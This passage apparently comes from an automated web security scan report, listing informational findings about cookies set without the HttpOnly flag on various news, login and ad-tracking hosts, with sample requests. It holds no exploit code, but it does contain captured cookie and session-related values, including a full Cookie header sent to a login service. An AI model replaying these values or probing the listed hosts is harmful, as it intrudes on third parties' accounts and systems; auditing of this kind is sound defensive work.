The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-life/your-money-today/article.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.279. http://lifestyle.redacted/your-life/your-money-today/video.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-life/your-money-today/video.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=90974142a1fa41e29c7695f2839c0b2b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=891F4DE87D9848CF80723C7BDFB3C47D; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:22 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-life/your-money-today/video.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.280. http://lifestyle.redacted/your-look/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-look/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=6dd6fe6121814e1988587a283896d37d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=1E75E2518F694A5EA1B2E04278A9FA88; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:11 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-look/ HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.281. http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-look/makeup-skin-care-hair/staticslideshowessence.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=e4b40a5c5380474087c7ce996b9332b8; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=D137C55805D5479EA6BDD999E5265BC4; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:13 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.282. http://lifestyle.redacted/your-look/video/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-look/video/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=2ca1bb8bab954b2e8916ae5a5e84634d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=A5D1B9B54E4F4F0A904965554C0FDE74; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:20 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-look/video/ HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.283. http://live.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://live.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=a4bc8d41ac71ec541f1bf853a146540d; expires=Sat, 25-Jan-2031 02:08:23 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: live.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.284. http://local.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=8349c3df213b40858bffbf1ed5e320d4; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=AEB046B1DD804980BD22C1D7DC865D48; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.285. http://local.redacted/events.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/events.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=0af244c7b84341db94fa63f78ec59843; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=7CDA6FC0BCE8438688C10A27DAA3A3FA; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:53 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /events.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.286. http://local.redacted/gas-traffic.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/gas-traffic.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=5b47497cc43743d9be4c3d0002efa31f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=72D4472BCF114A3497BE87B9061DAD51; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:28 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gas-traffic.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.287. http://local.redacted/hourly.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/hourly.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=fe9b558f11c048c5b0bcfead5c27909c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=D700EC8FE6A84E6E86AF10C957726EEB; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:52 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hourly.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.288. http://local.redacted/movies-events.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/movies-events.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=362ea74ed69b4e3e91979daf6227ebc5; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=54E9E8A3E60641D9AC7FE4403046D572; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:43 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /movies-events.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.289. http://local.redacted/news.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/news.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=3953a7e65afb42b0ade3749d752dcf1c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=C14043A1E67E44BCAA9A3B68AA8AFD89; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.290. http://local.redacted/restaurants.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/restaurants.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=11c3bf43b93e4ed9af237f65b02844d7; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=47142BBDAAA74E00893F20DA82ED8C2E; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:45 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /restaurants.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.291. http://local.redacted/sports.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/sports.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=d11d2c165e674866abd16c8b8cb9e1bb; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=A7A43B87D4E04DEA9AC850EC95E92AE2; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:41 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sports.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.292. http://local.redacted/ten-day.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/ten-day.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=b091c91e5f57464f867c86a6838b0181; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=5D4B178CF6734098BD0B688BB765F218; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ten-day.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.293. http://local.redacted/weather.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/weather.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=fd5b4d05da194df0bdd44cf8adbd21ef; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=2B70DCC8FEC94F45B962D0715AF96955; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:33 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /weather.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.294. http://login.live.com/login.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://login.live.com
Path:	/login.srf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MSPRequ=lt=1296344874&id=N&co=1; path=/;version=1
MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1$uuid-f2f145b9-7949-4a38-9839-b8a7726474e0; path=/;version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296343067&co=1&id=265631; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

17.295. https://login.live.com/login.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/login.srf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MSPRequ=lt=1296342737&co=1&id=251248; path=/;version=1
MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce; domain=login.live.com;path=/;version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.296. https://login.live.com/pp900/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/pp900/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MSPRequ=lt=1296342794&co=1&id=N; path=/;version=1
MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-4c2d8b39-4613-4bc8-bb07-53657b3f42ca; path=/;version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.297. https://login.live.com/ppsecure/post.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/ppsecure/post.srf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-df41315e-45c6-4d60-b893-881795a1cb21; path=/;version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.298. https://login.live.com/ppsecure/secure.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/ppsecure/secure.srf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MSPRequ=lt=1296342796&co=1&id=N; path=/;version=1
MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-23efde8d-b534-4b63-8d36-38dc6e68d0f0; path=/;version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.299. https://login.live.com/resetpw.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/resetpw.srf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-4b999dd4-4e4f-4340-b8dc-e3af3429245c; path=/;version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.300. https://login.silverlight.net/login/createuser.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/createuser.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:27:25 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.301. https://login.silverlight.net/login/signin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:27:22 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.302. http://m.webtrends.com/dcs4vy72r99k7mykw0ttxzctv_9i1o/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.webtrends.com
Path:	/dcs4vy72r99k7mykw0ttxzctv_9i1o/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjI5NTEwNDk2LjMwMTI1Nzk5AAAAAAAEAAAACgAAANvfJ0263ydNtQAAAPcWLU30Fi1NHAEAAHrELU1zxC1NzQAAAM16RU3NekVNAwAAABMAAADNekVNzXpFTVcAAAD3Fi1N9BYtTRUAAAB6xC1Nc8QtTQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs4vy72r99k7mykw0ttxzctv_9i1o/dcs.gif?&dcsdat=1296399108887&dcssip=ajax.microsoft.com&dcsuri=/ajax/jQuery/jquery-1.3.2.min.js'&dcsref=http://burp/show/42&WT.co_f=173.193.214.243-2629510496.30125799&WT.vtid=173.193.214.243-2629510496.30125799&WT.vtvs=1296399108891&WT.vt_f_tlv=1294845031&WT.tz=-6&WT.bh=8&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=We%20are%20sorry%2C%20the%20page%20you%20requested%20cannot%20be%20found.&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1036x969&WT.fv=10.1&WT.slv=Unknown&WT.le=ISO-8859-1&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=ajax.microsoft.com%2Fajax%2FjQuery%2Fjquery-1.3.2.min.js'&WT.sli=Installed&WT.dcsvid=60c2f44dfd912641a24c313b7d619d75&WT.z_anonid=AxUFAAAAAAAWBwAAtB6%2FBX1JsfAlwGK0F9Loug!!&WT.vt_f_tlh=1294845031&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_nvr1=1&WT.vt_nvr2=1&WT.vt_nvr3=1&wtEvtSrc=ajax.microsoft.com%2Fajax%2FjQuery%2Fjquery-1.3.2.min.js'&wtDrillDir=%2Fajax%2F%3B%2Fajax%2Fjquery%2F&WT.dep=wtEvtSrc%3BwtDrillDir HTTP/1.1
Host: m.webtrends.com
Proxy-Connection: keep-alive
Referer: http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js'
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjI5NTEwNDk2LjMwMTI1Nzk5AAAAAAADAAAACgAAANvfJ0263ydNtQAAAPcWLU30Fi1NHAEAAHrELU1zxC1NAwAAABMAAADb3ydNut8nTVcAAAD3Fi1N9BYtTRUAAAB6xC1Nc8QtTQAAAAA-

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Sun, 30 Jan 2011 14:50:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcs4vy72r99k7mykw0ttxzctv_9i1o/dcs.gif?dcsredirect=124&dcstlh=0&dcstlv=0&dcsdat=1296399108887&dcssip=ajax.microsoft.com&dcsuri=/ajax/jQuery/jquery-1.3.2.min.js'&dcsref=http://burp/show/42&WT.co_f=173.193.214.243-2629510496.30125799&WT.vtid=173.193.214.243-2629510496.30125799&WT.vtvs=1296399108891&WT.vt_f_tlv=1294845031&WT.tz=-6&WT.bh=8&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=We%20are%20sorry%2C%20the%20page%20you%20requested%20cannot%20be%20found.&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1036x969&WT.fv=10.1&WT.slv=Unknown&WT.le=ISO-8859-1&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=ajax.microsoft.com%2Fajax%2FjQuery%2Fjquery-1.3.2.min.js'&WT.sli=Installed&WT.dcsvid=60c2f44dfd912641a24c313b7d619d75&WT.z_anonid=AxUFAAAAAAAWBwAAtB6%2FBX1JsfAlwGK0F9Loug!!&WT.vt_f_tlh=1294845031&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_nvr1=1&WT.vt_nvr2=1&WT.vt_nvr3=1&wtEvtSrc=ajax.microsoft.com%2Fajax%2FjQuery%2Fjquery-1.3.2.min.js'&wtDrillDir=%2Fajax%2F%3B%2Fajax%2Fjquery%2F&WT.dep=wtEvtSrc%3BwtDrillDir
Content-Length: 0
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjI5NTEwNDk2LjMwMTI1Nzk5AAAAAAAEAAAACgAAANvfJ0263ydNtQAAAPcWLU30Fi1NHAEAAHrELU1zxC1NzQAAAM16RU3NekVNAwAAABMAAADNekVNzXpFTVcAAAD3Fi1N9BYtTRUAAAB6xC1Nc8QtTQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"

17.303. http://media.fastclick.net/w/tre previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/tre

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lyc=AQAAAAEAAIAAAZVagAdAAANsSwAA; domain=.fastclick.net; path=/; expires=Tue, 29-Jan-2013 01:23:50 GMT
pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Tue, 29-Jan-2013 01:23:50 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.304. http://metrics.hoovers.com/b/ss/hooverspaid-prod,%20hooversglobal-prod/1/H.19.4/s29599577935878 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.hoovers.com
Path:	/b/ss/hooverspaid-prod,%20hooversglobal-prod/1/H.19.4/s29599577935878

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26A26274851D2CD5-60000130C044F459[CE]; Expires=Tue, 29 Jan 2013 01:54:49 GMT; Domain=.hoovers.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.305. http://michaelwann.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://michaelwann.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=0c7ec67e6546a0d27335d16adf1ea700; expires=Sat, 25-Jan-2031 02:08:31 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: michaelwann.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.306. http://money.redacted/auto-insurance/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/auto-insurance/article.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=c08717139d004559bd4f0225c985624e; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /auto-insurance/article.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.307. http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=4d8ce924396e4151b191c200b28be405; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.308. http://money.redacted/currency/currency-clash-dollar-vs-euro-smartmoney.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/currency/currency-clash-dollar-vs-euro-smartmoney.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=a96ec68b7d3a41e88ae91566940da75a; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.309. http://money.redacted/identity-theft/default-dyn.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/identity-theft/default-dyn.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=8a19b1c37abe4adaa07e1fe54f2a83e1; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /identity-theft/default-dyn.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.310. http://money.redacted/market-news/post.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/market-news/post.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=fc74895a2afe4dbb8b81357837158fa3; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /market-news/post.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.311. http://money.redacted/mutual-fund/default-dyn.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/mutual-fund/default-dyn.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=78fc912bcfc74a00b174e74deda213d4; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mutual-fund/default-dyn.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.312. http://money.redacted/saving-money/50-30-20-budget.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/saving-money/50-30-20-budget.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=4d2c950ddf854b40a5add97ca57f1813; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /saving-money/50-30-20-budget.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.313. http://redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MUID=74239CED20224902AC862552C566F9F3; expires=Sun, 01-Nov-2020 07:00:00 GMT; domain=.redacted; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.314. http://redacted/detail/stock_quote previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/detail/stock_quote

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MUID=f1e153930f7d43c7a9fd16af4cdded3a; domain=.redacted; expires=Tue, 29-Jan-2013 23:48:21 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /detail/stock_quote HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.315. http://redacted/inc/Attributions.asp previous next

Summary

Severity:	Information
